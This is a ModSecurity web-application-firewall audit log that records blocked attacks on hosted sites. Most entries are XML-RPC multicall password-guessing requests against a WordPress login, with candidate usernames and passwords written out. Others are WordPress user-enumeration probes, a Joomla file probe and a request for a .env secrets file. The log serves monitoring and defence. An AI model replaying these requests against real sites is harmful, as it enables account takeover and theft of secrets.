Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baefa20f-Z-- --7717e971-A-- [25/May/2025:14:01:07 +0700] aDLAM3P6UgzLD1l8HToWqAAAAAk 103.236.140.4 60266 103.236.140.4 8181 --7717e971-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7717e971-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmi12antix_admin34 --7717e971-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7717e971-E-- --7717e971-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156467301112 5293 (- - -) Stopwatch2: 1748156467301112 5293; combined=3947, p1=472, p2=3298, p3=0, p4=0, p5=104, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7717e971-Z-- --2f03ab30-A-- [25/May/2025:14:01:11 +0700] aDLAN3P6UgzLD1l8HToWtQAAAAI 103.236.140.4 60306 103.236.140.4 8181 --2f03ab30-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2f03ab30-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmi12antix_admin34 --2f03ab30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f03ab30-E-- --2f03ab30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156471466821 4949 (- - -) Stopwatch2: 1748156471466821 4949; combined=3927, p1=459, p2=3305, p3=0, p4=0, p5=96, sr=85, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f03ab30-Z-- --59912a1f-A-- [25/May/2025:14:04:06 +0700] aDLA5hEdxfhJOSxH8A8XlQAAAFE 103.236.140.4 33610 103.236.140.4 8181 --59912a1f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.214.55.193 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.214.55.193 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --59912a1f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmilistelist123 --59912a1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59912a1f-E-- --59912a1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.214.55.193 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156646271257 6045 (- - -) Stopwatch2: 1748156646271257 6045; combined=4545, p1=535, p2=3832, p3=0, p4=0, p5=105, sr=89, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59912a1f-Z-- --916a2610-A-- [25/May/2025:14:05:55 +0700] aDLBU9erygsLmB9N_YR5MQAAAJE 103.236.140.4 34694 103.236.140.4 8181 --916a2610-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.93.250.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.93.250.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --916a2610-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --916a2610-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156755066630 2965 (- - -) Stopwatch2: 1748156755066630 2965; combined=1262, p1=411, p2=815, p3=0, p4=0, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916a2610-Z-- --0ff2073b-A-- [25/May/2025:14:08:03 +0700] aDLB03P6UgzLD1l8HToYhwAAAAk 103.236.140.4 35796 103.236.140.4 8181 --0ff2073b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 4.232.171.163 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 4.232.171.163 X-Forwarded-Proto: https Connection: close Content-Length: 489 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0ff2073b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix-admin-2022 --0ff2073b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ff2073b-E-- --0ff2073b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 4.232.171.163 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156883851680 5564 (- - -) Stopwatch2: 1748156883851680 5564; combined=4058, p1=460, p2=3429, p3=0, p4=0, p5=100, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ff2073b-Z-- --86d3776e-A-- [25/May/2025:14:08:11 +0700] aDLB23awJq5017Xs8D70CwAAANM 103.236.140.4 35868 103.236.140.4 8181 --86d3776e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --86d3776e-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiFAHMI@12345 --86d3776e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86d3776e-E-- --86d3776e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156891948136 5615 (- - -) Stopwatch2: 1748156891948136 5615; combined=3975, p1=464, p2=3336, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86d3776e-Z-- --488b4227-A-- [25/May/2025:14:09:55 +0700] aDLCQ9erygsLmB9N_YR6TgAAAJI 103.236.140.4 36798 103.236.140.4 8181 --488b4227-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 4.232.171.163 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 4.232.171.163 X-Forwarded-Proto: https Connection: close Content-Length: 501 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --488b4227-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmibusinessintegrator.com_fahmi --488b4227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --488b4227-E-- --488b4227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 4.232.171.163 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748156995022693 5613 (- - -) Stopwatch2: 1748156995022693 5613; combined=4022, p1=455, p2=3349, p3=0, p4=0, p5=123, sr=91, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --488b4227-Z-- --8d64e038-A-- [25/May/2025:14:13:25 +0700] aDLDFXawJq5017Xs8D71eAAAAMU 103.236.140.4 38662 103.236.140.4 8181 --8d64e038-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 204.48.23.212 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 204.48.23.212 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8d64e038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d64e038-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748157205627630 752 (- - -) Stopwatch2: 1748157205627630 752; combined=313, p1=274, p2=0, p3=0, p4=0, p5=39, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d64e038-Z-- --9acb610f-A-- [25/May/2025:14:14:09 +0700] aDLDQXP6UgzLD1l8HToa4QAAAAk 103.236.140.4 39060 103.236.140.4 8181 --9acb610f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 52.242.231.141 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9acb610f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiadminantix2020 --9acb610f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9acb610f-E-- --9acb610f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 52.242.231.141 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748157249095333 5651 (- - -) Stopwatch2: 1748157249095333 5651; combined=4079, p1=501, p2=3432, p3=0, p4=0, p5=90, sr=71, sw=56, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9acb610f-Z-- --be92950c-A-- [25/May/2025:14:15:23 +0700] aDLDi3awJq5017Xs8D711wAAAMQ 103.236.140.4 39750 103.236.140.4 8181 --be92950c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --be92950c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiadminantix.com --be92950c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be92950c-E-- --be92950c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748157323163256 5029 (- - -) Stopwatch2: 1748157323163256 5029; combined=3713, p1=417, p2=3150, p3=0, p4=0, p5=86, sr=79, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be92950c-Z-- --943bd917-A-- [25/May/2025:14:21:01 +0700] aDLE3XawJq5017Xs8D724QAAAMw 103.236.140.4 42900 103.236.140.4 8181 --943bd917-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 52.242.231.141 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 52.242.231.141 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --943bd917-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmiantix123#$ --943bd917-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --943bd917-E-- --943bd917-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 52.242.231.141 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748157661878180 5463 (- - -) Stopwatch2: 1748157661878180 5463; combined=3882, p1=421, p2=3268, p3=0, p4=0, p5=112, sr=76, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --943bd917-Z-- --d30fe402-A-- [25/May/2025:14:28:01 +0700] aDLGgXP6UgzLD1l8HToibQAAABY 103.236.140.4 47700 103.236.140.4 8181 --d30fe402-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.164.218.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.164.218.198 X-Forwarded-Proto: http Connection: close --d30fe402-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d30fe402-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748158081470828 2545 (- - -) Stopwatch2: 1748158081470828 2545; combined=903, p1=369, p2=509, p3=0, p4=0, p5=25, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d30fe402-Z-- --5814bc76-A-- [25/May/2025:14:40:41 +0700] aDLJederygsLmB9N_YSDZQAAAJY 103.236.140.4 54588 103.236.140.4 8181 --5814bc76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.47.238.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.47.238.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5814bc76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5814bc76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748158841856891 3486 (- - -) Stopwatch2: 1748158841856891 3486; combined=1974, p1=595, p2=1345, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5814bc76-Z-- --4e88285c-A-- [25/May/2025:14:46:37 +0700] aDLK3derygsLmB9N_YSGEgAAAJI 103.236.140.4 57906 103.236.140.4 8181 --4e88285c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4e88285c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix.co.uk --4e88285c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e88285c-E-- --4e88285c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 185.18.232.22 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748159197970646 5283 (- - -) Stopwatch2: 1748159197970646 5283; combined=4081, p1=449, p2=3466, p3=0, p4=0, p5=98, sr=84, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e88285c-Z-- --42142106-A-- [25/May/2025:14:46:39 +0700] aDLK39erygsLmB9N_YSGGwAAAJg 103.236.140.4 57924 103.236.140.4 8181 --42142106-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.150.34 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.150.34 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --42142106-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix.co.uk --42142106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42142106-E-- --42142106-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.150.34 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748159199791962 5601 (- - -) Stopwatch2: 1748159199791962 5601; combined=4045, p1=480, p2=3399, p3=0, p4=0, p5=98, sr=111, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42142106-Z-- --4eb90935-A-- [25/May/2025:14:58:57 +0700] aDLNwderygsLmB9N_YSJmAAAAJI 103.236.140.4 36244 103.236.140.4 8181 --4eb90935-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.83.37.35 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.83.37.35 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4eb90935-C-- system.multicallmethodNamewp.getUsersBlogsparamsfahmifahmi!@#$%^&*() --4eb90935-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eb90935-E-- --4eb90935-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748159937125440 5734 (- - -) Stopwatch2: 1748159937125440 5734; combined=4239, p1=448, p2=3564, p3=30, p4=35, p5=96, sr=85, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
